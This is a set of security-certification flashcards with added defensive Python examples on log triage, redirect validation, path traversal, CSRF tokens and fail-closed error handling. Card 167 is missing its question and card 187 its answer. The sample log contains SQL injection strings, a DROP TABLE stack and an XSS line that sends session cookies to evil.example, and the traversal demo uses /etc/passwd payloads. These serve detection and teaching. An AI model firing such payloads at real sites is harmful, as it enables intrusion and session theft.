A cyber incident recently went unpunished because the incident response process contaminated evidence. An investigation revealed that the first responders did not have the proper tools readily available at the time needed. You are assembling a forensics kit so this does not occur again. Which of the following would NOT be included in it?

A)Write blocker
B)Cables
C)SCADA device
D)Digital forensics workstation

A

A Supervisory Control and Data Acquisition (SCADA) device is a system operating with coded signals over communication channels that provides control of remote equipment. It is not used in forensic investigations.

160
Q

The items that should be included in a digital forensics kit are:

A

Digital forensics workstation – A dedicated workstation for processing an investigation that includes special tools and utilities that make the process easier and more productive.

Write blockers – A tool that permits read-only access to data storage devices without compromising the integrity of the data.

Cables – You should carry a variety of cables for connecting to storage devices.

Drive adapters – Adapters can enable connections to drives for which you have no cable.

Wiped removable media – Your kit should have removable media of various types that has been wiped clean. These may include USB flash drives, external hard drives, Multimedia Cards (MMC), Secure Digital (SD) cards, CompactFlash (CF) cards, Memory Sticks, xD-Picture Cards, CDs, CD-RWs, DVDs, and Blu-ray discs.

Cameras – Digital cameras with 12 megapixels (MP) or greater image sensors and manual exposure settings (in addition to any automatic or programmed exposure modes) are usually suitable for crime scene and evidence photography.

Crime tape – Flagging or adhesive pre-printed tape intended to block off the area and prevent unauthorized individuals from entering.

Tamper-proof seals – Used to ensure that the chain of custody is maintained.

Documentation/forms – Used to document the crime, the crime scene, and the evidence. There may also be interviews with witnesses. Most of these form templates are developed by the company based on standards.

161
Q
A

The forms that should be present in the kit are:

Chain of custody form – This form will indicate who has handled the evidence, when they handled it, and the order in which the handler was in possession of the evidence.

Incident response plan – This plan should be formally designed, well communicated, and followed. It should specifically address cyber-attacks against an organization’s IT systems.

Incident form – This form is used to describe the incident in detail. It should include sections to record CMOS, hard drive information, image archive details, analysis platform information, and other details.

Call list/escalation list – This list should indicate under what circumstance individuals should be contacted and should include current contact information.

162
Q

You are analyzing the results of a vulnerability scan. One of the vulnerabilities detected on one of your servers has the following CVSS breakdown:

CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N

Which of the following is the location of the attack vector?

A)the local system
B)the local network
C)anywhere in the world
D)the corporate network

A

An attacker would need local access to the system, with read/write/execute capability, to exploit this vulnerability. Local access can be physical (at the console), remote through a shell such as an SSH session, or obtained by convincing a user to open the attacker's program on the system through social engineering.

163
Q

You are your organization’s security analyst. Recently, you discovered that an attacker injected malicious code into a web application on your organization’s website. You discovered this attack by reviewing the log data on the web servers. Which type of attack did your organization experience?

A)buffer overflow
B)SQL injection
C)cross-site scripting
D)path traversal

A

Your organization experienced a cross-site scripting (XSS) attack. An XSS attack occurs when an attacker locates a vulnerability on a website that allows the attacker to inject malicious script into a web application, so that the script later runs in other users' browsers. A persistent (stored) XSS attack occurs when data provided to the web application is first stored on the server and later displayed to users without being HTML-encoded. A non-persistent (reflected) XSS attack occurs when data provided by a web client is used immediately by server-side scripts to generate results for that user. XSS flaws occur whenever an application takes user-supplied data and sends it to a web browser without first validating or encoding the data.

To locate XSS attacks, you should look for lines in the web server log that contain JavaScript or other scripting languages that forward a user’s session cookie to an external location or web page.

164
Q

When you study malware to discover how it functions, what operation are you performing?

A)Penetration testing
B)Vulnerability testing
C)Reverse engineering
D)Rules of engagement

A

Reverse engineering means to take something apart to discover how it works and perhaps to replicate it. In cybersecurity, reverse engineering is used to analyze both hardware and software for various reasons. Among these reasons are:

To discover how malware functions

To determine whether malware is present in software

To locate software bugs

To locate security problems in hardware

165
Q

Your company has recently been contracted to work on a project with the U.S. Department of Defense. As a result, your company must ensure that the enterprise follows the guidelines set forth in NIST Special Publication 800-53 Revision 5.

As a security analyst, you are tasked with analyzing the enterprise and making suggestions on the appropriate access controls to implement. When your analysis is complete, you recommend the following controls be added to the enterprise:

Security awareness training for all levels of personnel
Job rotation in all departments
Biometric authentication for the data center
Centralized data backups for all systems
Mantraps for the data center
CCTV at building entry and areas where sensitive data is accessed
You need to provide a report to management regarding these suggested controls that details the type of control provided by them. What type of control is provided by each of these control measures?

You need to identify the type of control each provides. Match each control on the left with the appropriate control type on the right. (Each control should only be matched with one control type.)

A

Detective managerial control – Job rotation

Detective physical control – CCTV

Corrective logical control – Centralized data backups

Preventative managerial control – Security awareness training

Preventative logical control – Biometric authentication

Preventative physical control – Mantraps

166
Q

A small business, with two employees, has an e-commerce site that processes credit card transactions, following PCI DSS guidelines. These guidelines call for a separation of duties, but neither of the employees has the time available for auditing transactions. For compliance, the business hires a third party to review the transactions, logs, and other pertinent information. This is an example of which type of control?

A)Operational control
B)Corrective control
C)Preventative control
D)Compensating control

A

This is an example of a compensating control. Compensating controls are alternative measures put in place to satisfy the intent of a requirement when the primary control cannot be implemented because of a legitimate technical or business constraint; PCI DSS requires them to be documented and reviewed. In this scenario, a third-party auditor compensates for the lack of the primary control, separation of duties. By itself, auditing is a detective control.

167
Q


A

An open redirect attack is occurring. Redirects are not inherently a bad thing; they are a useful function to have when building a website. If a user attempts to access a resource before logging in, it is conventional to redirect them to the login page, put the original URL in a query parameter, and then automatically redirect them to their original destination after they have logged in. The same mechanism is exactly why spammers and phishers find redirects so enticing. If the application does not validate the destination, an attacker can bounce a user off a site they trust and send them to an exact replica that is a malicious version of the site, where the user will log in and end up downloading malware, disclosing confidential information, and so on. This is a malicious (open) redirect attack.

This is not an example of remote code execution. Arbitrary or remote code execution occurs when attackers take advantage of a vulnerability to run code of their choosing on the target system, typically by placing malicious code there and triggering it remotely.

This is not a server-side request forgery (SSRF). An SSRF attack targets a server that hosts a web application and fetches a remote resource without validating the user-supplied URL. This allows an attacker to make the application send a crafted request to an unexpected destination, even when the system is protected by a firewall, VPN, or additional network access control list. SSRF was added to the OWASP Top 10, the list of the most critical web application security risks, in its 2021 edition.

A SQL injection is one of many types of injection attacks in which malicious SQL statements are injected into an input field in a web request and executed on a database server.
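
The login-and-return flow described above, with the validation that turns an open redirect into a safe one, as an added example that is not part of the original card. SITE_ORIGIN and the function names are assumptions made for the example.

```python
from urllib.parse import urlsplit

SITE_ORIGIN = "https://shop.example"   # assumed origin of the application doing the redirect


def is_safe_redirect(target: str, origin: str = SITE_ORIGIN) -> bool:
    """Allow only same-site relative paths, or absolute URLs on our own origin."""
    if not target or any(c in target for c in "\r\n\x00"):
        return False                                   # header-injection characters
    target = target.replace("\\", "/")                 # browsers treat '\' like '/' here
    parts = urlsplit(target)
    if not parts.scheme and not parts.netloc:          # relative URL
        # '/path' stays on this site; '//host/path' is scheme-relative and leaves it
        return target.startswith("/") and not target.startswith("//")
    site = urlsplit(origin)
    # absolute URL: scheme and host must both match; '@' tricks land in netloc and fail here
    return parts.scheme == site.scheme and parts.netloc.lower() == site.netloc.lower()


def redirect_after_login(next_url: str, fallback: str = "/account") -> str:
    """Return the URL the login handler should send the user to after a successful login."""
    return next_url if is_safe_redirect(next_url) else fallback


if __name__ == "__main__":
    for candidate in ("/orders/42", "//evil.example/login", "https://shop.example@evil.example/",
                      "javascript:alert(1)", "https://shop.example/orders/42"):
        print(f"{candidate!r:45} -> {redirect_after_login(candidate)}")
```

The cases rejected here are the usual bypasses for a naive "does it start with a slash" check: scheme-relative //host, backslash variants, user@host confusion and a javascript: scheme. An even stricter design avoids the problem entirely by storing the original destination server-side, or by accepting only a key into an allow-list of destinations, instead of accepting a URL from the query string.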

168
Q

Your team is planning the creation of several security baselines to be applied to the organization’s servers. You discuss aligning these baselines to an industry framework based on the job the server is performing. Which industry framework should be followed by the baseline applied to the commerce server that handles sales?

A)OWASP
B)CIS
C)ISO 27000
D)PCI-DSS

A

When a server is handling sales, it is typically handling credit card data and cardholder data. The Payment Card Industry Data Security Standard (PCI DSS) is an information security framework for organizations that process credit card transactions or handle cardholder data from the major card vendors.

169
Q

Recently your web server suffered a brute-force attack targeting the administrator password. What tool could you use to test the viability of a future brute-force attack on the web server?

A)W3AF
B)Nessus
C)Nikto
D)OWASP ZAP

A

OWASP ZAP (Zed Attack Proxy) is an intercepting proxy and web application scanner. Its forced-browse component, built on the DirBuster word lists, brute-forces directory and file names on web application servers, and its fuzzer can replay a login request with a list of candidate passwords, which is how you would test whether a brute-force attack on the administrator account remains viable after your fixes (account lockout, rate limiting, multi-factor authentication).

170
Q

Your team is planning a vulnerability scan and is trying to decide between an agent or agentless scan. Which of the following is TRUE regarding agent or agentless scanning?

A)agentless systems are based on the push communication style

B)agent-based systems are ideal for networks with limited bandwidth

C)agent-based systems experience quicker set-up and deployment

D)agent-based systems require less maintenance and lower provisioning costs

A

In the terminology used by this question, agentless systems are based on the push communication style: the scanner pushes its probes and credentials to each remote target on a periodic basis and collects what comes back, whereas agent-based systems use a pull method in which the central console interrogates the agents for the data they have already gathered locally. Be aware that vendors and other study materials often describe the same two designs the other way round (the agent pushes its results to the console), so check which convention a given product or exam uses. The remaining statements are false: agent-based systems need software installed and maintained on every host, so set-up takes longer and provisioning costs more; in return the scan work runs locally and results are available even for hosts that are off the network at scan time.

171
Q

As a security analyst for a US government body, you must implement a vulnerability scanning rate that fits within the confines of the Federal Information Security Management Act (FISMA). Of which scanning factor is this a part?

A)Workflow
B)Regulatory reporting requirements
C)Risk appetite
D)Technical constraints

A

The Federal Information Security Management Act (FISMA) is a part of the regulatory reporting requirements that affect the vulnerability scanning rate. All laws and regulations that affect the organization must be fully analyzed to determine their effect on the scanning rate.

172
Q

Your team is designing a set of security configurations and are looking for an industry framework to guide them in this design. Which of the following frameworks would be the BEST to consult for your web servers?

A)ISO 27000 series
B)CIS benchmark
C)PCI-DSS
D)OWASP Top Ten

A

The Open Web Application Security Project (OWASP) publishes the OWASP Top Ten, a periodically updated list (most recently revised in 2021) of the most critical security risks to web applications and the servers that host them, and provides recommendations and guidelines to address these vulnerabilities.

173
Q

Sam is reviewing web server logs after an attack. He discovers that many records contain semicolons and apostrophes in queries from end users. What type of attack should Sam suspect?

A)Cross-site scripting
B)SQL injection
C)LDAP injection
D)Buffer overflow

A

In a SQL injection attack, the attacker uses a web application's input to reach the underlying, backend database. Semicolons (;) and apostrophes (') are characteristic of these attacks. The single quote is SQL's string delimiter: an injected quote ends the current string literal so that whatever follows is parsed as SQL, which lets attackers craft always-true conditions to bypass authentication or pull more information from a database than is allowed. The semicolon terminates a statement, letting an attacker stack a second statement (such as DROP TABLE) behind the intended one where the database driver permits it.
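
The log-review approach described in this card and in card 163 (XSS), as an added example that is not part of the original cards: a Python triage pass over web server access logs. The log lines are constructed for the example (documentation IP ranges, a fictitious evil.example host). The patterns are indicators for triage, not a verdict; a legitimate name such as O'Brien also contains an apostrophe, and the last sample line shows it is left untagged.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample in combined log format (documentation-range IPs, not a real server's log).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:13:55:36 +0000] "GET /catalog?item=218 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2024:13:55:40 +0000] "GET /login?user=admin'%20OR%20'1'%3D'1 HTTP/1.1" 200 2048 "-" "curl/8.0"
203.0.113.9 - - [10/Mar/2024:13:55:41 +0000] "GET /catalog?item=218;DROP%20TABLE%20orders;-- HTTP/1.1" 500 512 "-" "curl/8.0"
198.51.100.4 - - [10/Mar/2024:13:56:02 +0000] "GET /search?q=%3Cscript%3Enew%20Image().src%3D%22http://evil.example/c?%22%2Bdocument.cookie%3C/script%3E HTTP/1.1" 200 3072 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2024:13:56:10 +0000] "GET /profile?name=O%27Brien HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" (?P<status>\d{3})'
)

# Script fragments that exfiltrate the session cookie or run attacker code in the victim's browser.
XSS_PATTERNS = [
    re.compile(r"<\s*script", re.I),
    re.compile(r"document\.cookie", re.I),
    re.compile(r"javascript:", re.I),
    re.compile(r"on(error|load|mouseover)\s*=", re.I),
]
# Quote-breaking, stacked statements and comment truncation typical of SQL injection probes.
SQLI_PATTERNS = [
    re.compile(r"'\s*(or|and)\s*'", re.I),                       # ' OR '1'='1
    re.compile(r"union\s+(all\s+)?select", re.I),
    re.compile(r";\s*(drop|insert|update|delete|exec)\b", re.I),  # stacked query after ';'
    re.compile(r"--\s*$|/\*"),                                   # comment out the rest of the query
]


def decode_target(target: str) -> str:
    """Percent-decode twice: attackers double-encode to slip past single-decode filters."""
    return unquote(unquote_plus(target))


def classify(line: str):
    """Return a record with attack tags for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    tags = []
    if any(p.search(decoded) for p in XSS_PATTERNS):
        tags.append("xss")
    if any(p.search(decoded) for p in SQLI_PATTERNS):
        tags.append("sqli")
    return {"ip": m.group("ip"), "ts": m.group("ts"), "status": int(m.group("status")),
            "target": decoded, "tags": tags}


def scan(log_text: str) -> list:
    """All parseable lines that carry at least one attack tag, in log order."""
    records = (classify(line) for line in log_text.splitlines() if line.strip())
    return [r for r in records if r and r["tags"]]


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["ip"], r["status"], r["tags"], r["target"])
```

Decoding before matching matters: the payload arrives percent-encoded, and double-encoded variants (%253C) are handled by the second pass. On real logs you would stream the file line by line and pivot on the source IP and on the 5xx responses that often accompany a successful injection probe, as the DROP TABLE line above shows.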

174
Q

You are the security administrator for your company. You identify a new security risk and decide to continue with the current security plan. However, you develop a contingency plan to implement if the security risk occurs. Which risk management principle is being described?

A)Avoid
B)Transfer
C)Accept
D)Mitigate

A

The risk management principle of accept (acceptance) is being described. Acceptance is when you acknowledge that a risk may occur but do not try to prevent it. Examples of acceptance would include taking no action at all or leaving the original security plan unchanged and developing a contingency or fallback plan. It is recommended that you accept a risk when the cost of the safeguard exceeds the amount of the potential loss.

The transfer principle (transference) involves shifting the risk and its consequences to a third party. The third party is then responsible for owning and managing the risk. Purchasing insurance is an example of transference.

The avoid principle (avoidance) involves modifying the security plan to eliminate the risk or its impact. Examples of avoidance would include stopping a risky activity altogether, adding security resources to eliminate the risk, or removing resources to eliminate the risk.

The mitigate principle (mitigation) involves reducing the probability or impact of a risk to an acceptable risk threshold. To mitigate a risk, you would take actions to minimize the probability of the risk occurring. Biometric locks on a server room’s doors mitigate the risk of an intruder breaking in where sensitive data is housed.

175
Q

To address recent issues in the parking lot, the company has installed a CCTV camera to monitor the lot. What type of control is this?

A)Managerial
B)Preventative
C)Corrective
D)Detective

A

A camera is a detective control because it allows you to detect when an issue occurs.

176
Q

On a penetration test of your client’s site, you see a shopping catalog. Upon looking at the pictures of the items in their catalog, you find the address of where the images are located in the web application: /var/coats/images/218.png.

You put that address in your browser’s URL as https://insecure-website.com/var/coats/images/218.png. The image of a coat shows up by itself. You take that image and alter the address path, making some guesses about the file structure to allow a certain type of attack to happen. There is no security against this attack in place. What is this attack called?

A)Cookie manipulation
B)Malicious file upload
C)File inclusion
D)Directory traversal

A

This is a directory traversal attack, also known as a path traversal attack. It is a very common attack against web sites and an easy way to reach files the application never intended to expose: private galleries, configuration files, or even username and email lists, bypassing access checks that are enforced only on the intended URLs. Frequently, the attack requires guessing the target subdirectory and/or filename; with some detective work, you can follow the normal file and directory structures that common platforms use. The attack works in two ways: by inserting dot-dot-slash (../) sequences (often URL-encoded) to climb out of the intended directory, or by supplying an absolute path directly (for example https://interconn.com/wp-content/uploads/2018/03). The defense is to decode the request path once, canonicalize it, and verify that it still lies under the intended base directory before opening it.
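The check described above, as an added example that is not part of the flashcard deck. It shows the image handler the card describes written two ways: one that simply joins the request path under the web root, and one that decodes once, canonicalizes, and rejects anything that leaves the root. The web root /var/coats/images is the hypothetical path from the card, and the traversal payloads are constructed for the demonstration.

```python
# Added example (not from the flashcard deck): a vulnerable image handler
# beside a hardened one, exercised with constructed traversal payloads.
# The web root /var/coats/images is the hypothetical path from the card.
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/coats/images"


def vulnerable_resolve(user_path: str) -> str:
    """Joins the request path under WEB_ROOT with no boundary check.

    ../ segments are honoured by normpath, and an absolute user path makes
    posixpath.join discard WEB_ROOT entirely, so the result can point
    anywhere on the filesystem.
    """
    return posixpath.normpath(posixpath.join(WEB_ROOT, unquote(user_path)))


def hardened_resolve(user_path: str):
    """Returns the canonical path if it stays inside WEB_ROOT, else None."""
    decoded = unquote(user_path)          # decode exactly once
    if "\x00" in decoded:                 # NUL-byte truncation tricks
        return None
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, decoded))
    # Compare on a directory boundary: "/var/coats/images-private/x"
    # must not pass a plain string-prefix test.
    if candidate != WEB_ROOT and not candidate.startswith(WEB_ROOT + "/"):
        return None
    return candidate


def classify(user_path: str) -> str:
    """Compares both resolvers for one request, for log/alert purposes."""
    unsafe = vulnerable_resolve(user_path)
    safe = hardened_resolve(user_path)
    if safe is None:
        return f"BLOCKED traversal attempt -> would have served {unsafe}"
    return f"OK {safe}"


if __name__ == "__main__":
    for p in ("218.png", "../../../etc/passwd",
              "..%2F..%2F..%2Fetc%2Fpasswd", "/etc/passwd",
              "../images-private/x"):
        print(p, "=>", classify(p))
```

In a real handler, resolve the final candidate with os.path.realpath as well, so that a symbolic link inside the web root cannot point back outside it; the string check above only covers the path as requested.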

177
Q

Cookie manipulation?

A

This is not cookie manipulation. Cookies are small pieces of data created and stored in a user’s browser that keep track of important information regarding the user’s session for a particular site. Cookie manipulation, also called cookie poisoning, is when a hacker is able to change data within that cookie to take over that user’s information or bypass security measures on websites.

178
Q

Before executing a vulnerability scan, you are evaluating all of the relevant considerations. Which of the following considerations is the MOST important?

A)regulatory requirements
B)sensitivity levels
C)performance
D)segmentation

A

While all considerations are important, it is critical that any organization operating in an industry where regulations or mandatory standards, such as HIPAA or PCI DSS, apply ensures that the scan supports verification that those requirements are being met (for example, that the scan covers every in-scope system and checks the controls the requirement names).

179
Q

You just observed a meeting of the risk evaluation team. They were assigning the values of high, medium, and low to some threats they had identified. What part of risk evaluation are they performing?

A)Technical control review
B)Regression analysis
C)Operational control review
D)Technical impact review

A

They are performing technical impact review. This is the process of assessing the potential impact of an event that is technical in nature. Once all assets have been identified and their value to the organization has been established, specific threats to each asset are identified. An attempt must be made to establish both the likelihood of the threat being realized, as well as the impact to the organization, should that occur. This can be done by assigning values like high, medium, and low to the threats to describe their impact and likelihood.

180
Q

Recently, while reviewing log data, you discover that a hacker has used a design flaw in an application to obtain unauthorized access to the application. Which type of attack has occurred?

A)privilege escalation
B)buffer overflow
C)backdoor
D)maintenance hook

A

An escalation of privileges attack occurs when an attacker has used a design flaw in an application to obtain unauthorized access to the application. Privilege escalation includes incidents where a user logs in with valid credentials and then takes over the privileges of another user of the same level (horizontal escalation), or where a user logs in with a standard account and uses a system flaw to obtain administrative privileges (vertical escalation).

181
Q

Race Condition

A

Race condition – a flaw that depends on timing, most often the window between time of check (TOC) and time of use (TOU): the application checks a condition (for example, that a file is not a symbolic link, or that an account balance is sufficient) and acts on it later, and an attacker changes the state in between. To eliminate race conditions, developers should make the check and the use a single atomic operation wherever possible (operate on an already-open file descriptor instead of re-resolving a path; use database transactions or compare-and-swap), hold an exclusive lock across the check-and-use sequence, and acquire locks in a consistent order and release them in reverse order so that the locking itself cannot deadlock.
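The TOC/TOU window described above, as an added example that is not part of the flashcard deck. The attacker's move between check and use is simulated by a callback rather than a real concurrent process, so the outcome is deterministic; the files are created in a temporary directory constructed by the demo. The hardened version opens first with O_NOFOLLOW and validates the descriptor it actually got.

```python
# Added example (not from the flashcard deck): a TOC/TOU race on a file path,
# with the attacker's move between check and use simulated by a callback.
# The files live in a temporary directory constructed inside run_demo().
import os
import stat
import tempfile


def read_vulnerable(path: str, during_window=None) -> bytes:
    """Time of check ... time of use: two separate path lookups."""
    if os.path.islink(path):                      # check
        raise PermissionError("symlinks are not allowed")
    if during_window:                             # attacker wins the race here
        during_window()
    with open(path, "rb") as fh:                  # use: path is resolved again
        return fh.read()


def read_hardened(path: str, during_window=None) -> bytes:
    """Open first, then validate the object actually opened.

    O_NOFOLLOW makes the kernel refuse a symlink atomically at open time,
    and fstat inspects the descriptor rather than re-resolving the name.
    """
    if during_window:                             # attacker moves before open
        during_window()
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise PermissionError("not a regular file")
        with os.fdopen(fd, "rb") as fh:           # fdopen owns fd from here
            fd = -1
            return fh.read()
    finally:
        if fd != -1:
            os.close(fd)


def run_demo() -> dict:
    """Returns what each variant yields when the file is swapped mid-call."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret.txt")
        public = os.path.join(d, "public.txt")
        with open(secret, "wb") as f:
            f.write(b"SECRET")

        def reset_public():
            if os.path.lexists(public):
                os.unlink(public)
            with open(public, "wb") as f:
                f.write(b"public")

        def attacker_swaps():                     # replace file with a symlink
            os.unlink(public)
            os.symlink(secret, public)

        results = {}
        reset_public()
        results["vulnerable"] = read_vulnerable(public, attacker_swaps)
        reset_public()
        try:
            results["hardened"] = read_hardened(public, attacker_swaps)
        except OSError:                           # ELOOP from O_NOFOLLOW
            results["hardened"] = "refused"
        reset_public()
        results["no_race"] = read_hardened(public)
        return results


if __name__ == "__main__":
    print(run_demo())
```

The vulnerable variant returns the secret because the symlink check and the open each resolve the name separately; the hardened variant refuses, and still reads normally when no swap happens.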

182
Q

Insecure direct object references

A

Insecure direct object references – occur when a developer exposes a reference to an internal object, such as a file, directory, database record, or key, as a URL or form parameter without implementing the appropriate security control. An attacker can manipulate the direct object reference (for example, changing id=101 to id=102) to access other objects without authorization. Implementing an access control check on every request, rather than assuming the identifier is secret, protects against these attacks; replacing the direct identifier with a per-user indirect reference is an additional defense.
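The access-control check described above, as an added example that is not part of the flashcard deck. It shows an invoice lookup that trusts the id in the request, the same lookup with an ownership check, and an indirect reference map that hands out per-user random handles instead of the database key. The invoice records are constructed sample data.

```python
# Added example (not from the flashcard deck): an invoice lookup that trusts
# the id in the URL, a version with an ownership check, and an indirect
# reference map that never exposes the database key at all. The invoice
# records are constructed sample data.
import secrets

INVOICES = {
    101: {"owner": "alice", "total": 40.00},
    102: {"owner": "bob", "total": 99.00},
}


def get_invoice_vulnerable(user: str, invoice_id: int) -> dict:
    """GET /invoice?id=102 -- any authenticated user gets any invoice."""
    return INVOICES[invoice_id]


def get_invoice_hardened(user: str, invoice_id: int) -> dict:
    """Same lookup with the access-control check the card calls for.

    Missing and forbidden raise the same error so an attacker cannot
    enumerate which ids exist.
    """
    inv = INVOICES.get(invoice_id)
    if inv is None or inv["owner"] != user:
        raise PermissionError("no such invoice")
    return inv


class IndirectReferenceMap:
    """Per-user random handles in place of direct database keys."""

    def __init__(self):
        self._handles = {}        # (user, handle) -> invoice_id

    def handle_for(self, user: str, invoice_id: int) -> str:
        h = secrets.token_urlsafe(12)
        self._handles[(user, h)] = invoice_id
        return h

    def resolve(self, user: str, handle: str) -> dict:
        invoice_id = self._handles.get((user, handle))
        if invoice_id is None:
            raise PermissionError("no such invoice")
        # Still enforce ownership on the real record (defence in depth).
        return get_invoice_hardened(user, invoice_id)
```

The indirect map is not a substitute for the ownership check: a handle tied to the wrong user, or a record whose owner changed, is still caught by get_invoice_hardened.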

183
Q

Cross-site request forgery (CSRF)

A

Cross-site request forgery (CSRF) – occurs when a malicious site causes a victim's browser to send a request to a web site on which the victim is already authenticated; because the browser automatically attaches the victim's cookies, the target site treats the forged request as a legitimate command from that user. It is also referred to as a one-click attack or session riding. Implementing anti-forgery (synchronizer) tokens that the attacker's site cannot read protects against this attack; setting the SameSite attribute on session cookies is a complementary defense.
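The anti-forgery token described above, as an added example that is not part of the flashcard deck. Tokens are an HMAC over the session identifier and a random nonce, so a token is bound to one session and can be verified without server-side state; the handler then rejects a forged cross-site POST that carries the cookie but not the token. SERVER_KEY and the request dictionaries are constructed for the demonstration.

```python
# Added example (not from the flashcard deck): HMAC-based anti-forgery tokens
# bound to the session, and a request handler that rejects a forged
# cross-site POST. SERVER_KEY and the request dicts are constructed here.
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # in production: loaded from config/KMS


def issue_csrf_token(session_id: str) -> str:
    """Token = nonce.HMAC(key, session_id:nonce); embed it in the form."""
    nonce = secrets.token_urlsafe(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(),
                   hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id, token) -> bool:
    if not session_id or not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)   # constant-time comparison


def handle_transfer(request: dict) -> str:
    """POST /transfer. The browser attaches the session cookie automatically,
    so the cookie alone proves nothing about where the form was submitted."""
    session_id = request.get("cookies", {}).get("session")
    token = request.get("form", {}).get("csrf_token")
    if not verify_csrf_token(session_id, token):
        return "403 Forbidden: missing or invalid anti-forgery token"
    amount = request["form"]["amount"]
    return f"200 OK: transferred {amount}"


def scenario() -> dict:
    victim_session = "sess-7f3a"
    form_token = issue_csrf_token(victim_session)   # rendered in the site's own form
    legit = {"cookies": {"session": victim_session},
             "form": {"csrf_token": form_token, "amount": "10"}}
    # Forged request from evil.example: the cookie rides along, the token does not.
    forged = {"cookies": {"session": victim_session},
              "form": {"amount": "9999"}}
    # A token issued for a different session does not transfer either.
    other = {"cookies": {"session": victim_session},
             "form": {"csrf_token": issue_csrf_token("sess-attacker"),
                      "amount": "9999"}}
    return {"legit": handle_transfer(legit),
            "forged": handle_transfer(forged),
            "other_session": handle_transfer(other)}


if __name__ == "__main__":
    print(scenario())
```

The token must be delivered in the page body or a custom header, never only in a cookie: anything the browser sends automatically is exactly what the forging site gets for free.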

184
Q

Improper error and exception handling

A

Improper error and exception handling – occurs when developers do not design appropriate error or exception handling in an application. The most common problem resulting from this issue is the fail-open security check, in which access is granted (instead of denied) when an error occurs. Other issues include system crashes, resource consumption, and error messages that leak stack traces, internal paths, or database details to the user. Error handling mechanisms should be properly designed, fail closed, and log the detail for future reference and troubleshooting while returning only a generic message to the user.
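The fail-open check described above, as an added example that is not part of the flashcard deck. An authorization decision depends on a policy store; when that store throws, the first version silently grants access and the second denies, logs the exception, and returns a generic response. The policy store and its outage are simulated.

```python
# Added example (not from the flashcard deck): an authorization check that
# fails open when its backend throws, beside the fail-closed version that
# logs the detail and returns a generic denial. The policy store and the
# outage are simulated.
import logging

log = logging.getLogger("authz")


class PolicyStoreDown(RuntimeError):
    pass


def policy_lookup(user: str, action: str, store_up: bool) -> bool:
    """Stand-in for a call to a policy service; raises when it is down."""
    if not store_up:
        raise PolicyStoreDown("policy service timeout")
    return user == "admin" and action == "delete"


def is_allowed_fail_open(user, action, store_up=True) -> bool:
    try:
        return policy_lookup(user, action, store_up)
    except Exception:
        # Swallowing the error and carrying on grants access by default.
        return True


def is_allowed_fail_closed(user, action, store_up=True) -> bool:
    try:
        return policy_lookup(user, action, store_up)
    except Exception as exc:
        # Detail goes to the log for troubleshooting; the caller gets a denial.
        log.error("authz backend error for %s/%s: %r", user, action, exc)
        return False


def handle(user, action, checker, store_up=True) -> str:
    """What the user sees: a generic status, never the exception text."""
    if checker(user, action, store_up):
        return "200 OK"
    return "403 Forbidden"
```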

185
Q

Improper Storage of sensitive data

A

Improper storage of sensitive data – occurs when sensitive data is not properly secured when it is stored. Sensitive data should be encrypted at rest and protected with the appropriate access control list. Also, when sensitive data is in memory, it should be locked (pinned so that it cannot be swapped to disk) and zeroed as soon as it is no longer needed.

186
Q

Secure cookie storage and transmission

A

Secure cookie storage and transmission – Cookies store a user's web site data, usually a session identifier and sometimes confidential data such as usernames, passwords, or financial information (which should not be placed in a cookie at all). A secure cookie has the Secure attribute enabled and is only sent over HTTPS, ensuring that the cookie is always encrypted during transmission. The HttpOnly attribute additionally keeps the cookie out of reach of script in the page, and the SameSite attribute limits when the browser sends it on cross-site requests.
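The cookie attributes described above, as an added example that is not part of the flashcard deck. It builds a session cookie with Secure, HttpOnly and SameSite set, and audits an arbitrary Set-Cookie header for the attributes a practitioner would expect to find. The sample header values are constructed.

```python
# Added example (not from the flashcard deck): building a session cookie with
# the Secure, HttpOnly and SameSite attributes, and an auditor that flags a
# Set-Cookie header missing them. The sample headers are constructed.
from http.cookies import SimpleCookie

REQUIRED = ("secure", "httponly", "samesite")


def build_session_cookie(session_id: str) -> str:
    """Returns the value of a hardened Set-Cookie header."""
    c = SimpleCookie()
    c["session"] = session_id
    c["session"]["secure"] = True        # HTTPS only
    c["session"]["httponly"] = True      # not readable from JavaScript
    c["session"]["samesite"] = "Strict"  # not sent on cross-site requests
    c["session"]["path"] = "/"
    return c["session"].OutputString()


def audit_set_cookie(header_value: str) -> list:
    """Returns the names of required attributes that are missing.

    Attribute names are case-insensitive per the cookie spec, so they are
    lower-cased before comparison.
    """
    parts = [p.strip() for p in header_value.split(";")]
    attrs = {}
    for p in parts[1:]:                  # parts[0] is name=value
        name, _, value = p.partition("=")
        attrs[name.strip().lower()] = value.strip()
    missing = [a for a in REQUIRED if a not in attrs]
    if attrs.get("samesite", "").lower() == "none" and "secure" not in attrs:
        missing.append("samesite=None requires Secure")
    return missing


if __name__ == "__main__":
    hardened = build_session_cookie("abc123")
    print(hardened, audit_set_cookie(hardened))
    print(audit_set_cookie("session=abc123; Path=/"))
```

Run the auditor over the Set-Cookie headers a scanner or proxy captured from the application; any non-empty result is a finding.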

187
Q

Memory leaks

A

